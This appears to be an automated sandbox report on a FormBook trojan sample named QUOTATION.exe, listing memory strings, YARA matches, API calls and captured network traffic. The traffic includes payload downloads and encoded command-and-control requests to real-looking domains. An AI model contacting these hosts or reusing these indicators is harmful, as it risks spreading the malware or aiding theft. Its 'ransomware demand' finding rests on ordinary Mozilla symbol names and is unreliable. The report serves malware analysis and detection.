          Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/help/feedback?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow
          Source: firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/hosting?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_hosti
          Source: firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/scripts/shop_window.pl?utm_source=shopwindow&utm_medium=click&utm_campaign=s
          Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl&wn_ca
          Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl2&wn_c
          Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/ssl?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_ssl_banne
          Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/wn/img/email/logo-bottom.png
          Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/wn/img/logo-horizontal.svg
          Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_logo&wn_campa
          Source: QUOTATION.exe, 00000008.00000003.4189935994.0000000003470000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.0000000003473000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4188808351.0000000003470000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.3934592654.0000000003470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wittofitentertainment.com/
          Source: QUOTATION.exe, 00000008.00000002.4313926438.000000000345B000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4313926438.0000000003418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wittofitentertainment.com/VeHZpcMYNF28.bin
          Source: QUOTATION.exe, 00000008.00000002.4313926438.0000000003418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wittofitentertainment.com/VeHZpcMYNF28.bin(
          Source: QUOTATION.exe, 00000008.00000002.4313926438.0000000003418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wittofitentertainment.com/VeHZpcMYNF28.binx
          Source: explorer.exe, 00000009.00000002.8041134967.00000000157BC000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000527C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
          Source: unknownHTTP traffic detected: POST /d91r/ HTTP/1.1Host: www.cardinialethanol.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.cardinialethanol.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cardinialethanol.com/d91r/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 4f 3d 38 48 4c 51 72 42 73 6a 77 64 65 56 55 5f 33 79 73 58 4f 4f 45 48 79 6b 4c 70 76 52 41 71 75 70 6b 59 33 32 72 75 4e 52 6a 51 42 61 74 61 50 34 46 66 4a 5f 37 36 4a 6c 4f 46 62 59 34 51 6b 36 56 33 68 46 64 54 61 6a 74 4e 38 30 49 78 51 45 59 58 45 6c 54 37 30 76 5a 6f 65 4f 64 51 54 6f 54 6d 6c 58 72 36 53 75 34 69 6e 5a 6c 4b 77 6d 52 35 7a 52 4a 4f 68 79 76 67 6a 79 64 6f 6a 75 78 4b 56 6d 55 5a 57 69 59 70 38 72 4b 49 57 43 51 48 74 64 61 74 50 4d 62 73 28 32 39 72 56 32 44 59 47 69 75 39 51 58 6e 37 50 42 30 77 50 61 57 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: pO=8HLQrBsjwdeVU_3ysXOOEHykLpvRAqupkY32ruNRjQBataP4FfJ_76JlOFbY4Qk6V3hFdTajtN80IxQEYXElT70vZoeOdQToTmlXr6Su4inZlKwmR5zRJOhyvgjydojuxKVmUZWiYp8rKIWCQHtdatPMbs(29rV2DYGiu9QXn7PB0wPaWg).
          Source: unknownDNS traffic detected: queries for: www.wittofitentertainment.com
          Source: global trafficHTTP traffic detected: GET /VeHZpcMYNF28.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.wittofitentertainment.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=5uELbA0g21s84RfIYZefn7jmwGm7oIOOLOAnPy0CEmjl7E2osw+P2nrFQVa8XPAXlQFWR1Kf++ZUi1OuENtNpjpnS7NncHgQqw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.flaviosilva.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.solya-shop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=mm2yDWovojsq98EVpVvEejLaRDawKnKNjB2g4hWos3CUrPXkYcC/p+nLjVs5nQU/dkGDVZ/wRxzIeHsnSgbyBomSUgQTl++E/Q==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.buymyenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=QRVitphc0g1OIlGqribmuO+/vkIwz3nmW5e0zmbI+ptVqgaVXv4o34I8PAy9Ptw3AL0LuNtl4GkWhRdrmVn9ER/XiJFNsBOU8g==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.184411.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=A3xSHk+fyI7su/grjjiR7vS7+2q1W7vJyDCiqNYDPcjU2Prp7aaot61k+Logkh61BwiUEQE66B2EoDKGsTYBbPn+5VOUdQAbGQ==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.b-tek.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.dexmart.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=eODNz5pw0nGnv4SFyTaum/5/t7nqNWp+9hyyxvutUEIaFJ9+iSImfL8MjMj4uhwzobeFgf5ptQiqPWHvQt8dHyNKhUrdKKLp8Q==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.maxhaidt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=9I8nCmGbZhqNwxnuseOoBgVoo3mEoWGWlq2S/FO71IXVKobHlwQLLDq9ejz9WGKrhGOo7OtXutt8bUbRiDDVGcEjYwCLb2KUDQ==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.ghostdyes.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=PMnnsBn+KIOLN/VfOifa/NU1HKCRW97HYgMDorQQf0wo2T3aBqzEKnmyN0lZa7FB9krY/amKEMrac7kP3KvtrQL60DCopbH9IA==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.aznqmd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=Cz7EdLoZVVVFkl6Al85Fq2yKknQr9MrL8MY+iTrjKvcqeI67VNXHoBdgAYm0xOpsMAVI5pfYswEw4evz8uHbKlZcCugzfDdIKQ==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.texasgent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=BFqfPYQ6Rc2mbekoZnhhN28rIM4KcYUdKeGPb5qgdPRiCoEueOOZiURhvdwkEmvoJvWE5RZiBCNwm7zhRu2A+WCDMptVnP5c5Q==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.brightfms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=hOvML0SIJI9mj/fVfRhHepYZOU2m/dN5Na3UVct1YKAZzOLDbZKzqMpLuDmWZppR8Dfu1BJtX3CBTvv/fKLJ92Wtoj7W2JzMDw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.eta-trader.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=JQY8+24Njt/kPRjDacJftkXMjEMtZDsomMU4C5dHhuIEkrjQwkIyHBDAmNyMXnYjy8/Wz0vFGvMg0maSaemc6vUg0VCqTOU0ug==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.funvacayflorida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=5uELbA0g21s84RfIYZefn7jmwGm7oIOOLOAnPy0CEmjl7E2osw+P2nrFQVa8XPAXlQFWR1Kf++ZUi1OuENtNpjpnS7NncHgQqw==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.flaviosilva.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d91r/?pO=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&8H7gL=Bxcfm_qbbEGm HTTP/1.1Host: www.solya-shop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownHTTPS traffic detected: 162.240.73.101:443 -> 192.168.11.20:49835 version: TLS 1.2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_0040523F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Found potential ransomware demand text
          Source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
          Source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
          Source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ
          Source: help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ
          Source: help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AEBV?$ProfilerStringView@D@1@AEBVMarkerCategory@1@$$QEAVMarkerOptions@1@UTextMarker@markers@01@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z??0PrintfTarget@mozilla@@IEAA@XZ??1MutexImpl@detail@mozilla@@QEAA@XZ??2@YAPEAX_K@Z??3@YAXPEAX@Z??3@YAXPEAX_K@Z??_U@YAPEAX_K@Z??_V@YAXPEAX@Z?BeginProcessRuntimeInit@detail@mscom@mozilla@@YAAEA_NXZ?CleanupProcessRuntime@mozilla@@YAXXZ?CreateAndStorePreXULSkeletonUI@mozilla@@YAXPEAUHINSTANCE__@@HPEAPEAD@Z?DllBlocklist_Initialize@@YAXI@Z?DllBlocklist_SetBasicDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?DllBlocklist_SetFullDllServices@@YAXPEAVDllServicesBase@detail@glue@mozilla@@@Z?EndProcessRuntimeInit@detail@mscom@mozilla@@YAXXZ?GetProfilingStack@AutoProfilerLabel@baseprofiler@mozilla@@SAPEAVProfilingStack@23@XZ?IsWin32kLockedDown@mozilla@@YA_NXZ?MapRemoteViewOfFile@mozilla@@YAPEAXPEAX0_K01KK@Z?Now@TimeStamp@mozilla@@CA?AV12@_N@Z?NowUnfuzzed@TimeStamp@mozilla@@CA?AV12@_N@Z?PollPreXULSkeletonUIEvents@mozilla@@YAXXZ?WindowsDpiInitialization@mozilla@@YA?AW4WindowsDpiInitializationResult@1@XZ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AEAAXXZ?gTwoCharEscapes@detail@mozilla@@3QBDB?lock@MutexImpl@detail@mozilla@@IEAAXXZ?profiler_current_thread_id@baseprofiler@mozilla@@YAHXZ?profiler_init@baseprofiler@mozilla@@YAXPEAX@Z?profiler_shutdown@baseprofiler@mozilla@@YAXXZ?unlock@MutexImpl@detail@mozilla@@IEAAXXZ?vprint@PrintfTarget@mozilla@@QEAA_NPEBDPEAD@Z_wcsdupfreemallocmoz_xmallocmozalloc_abortreallocstrdup
          Source: help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: QUOTATION.exe
          Source: QUOTATION.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4281303153.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.7993766326.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.7999850935.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.7994581430.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4281579504.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_00406666
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 2_2_6F601A98
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_337EF330
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_3373E310
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 8_2_33721380
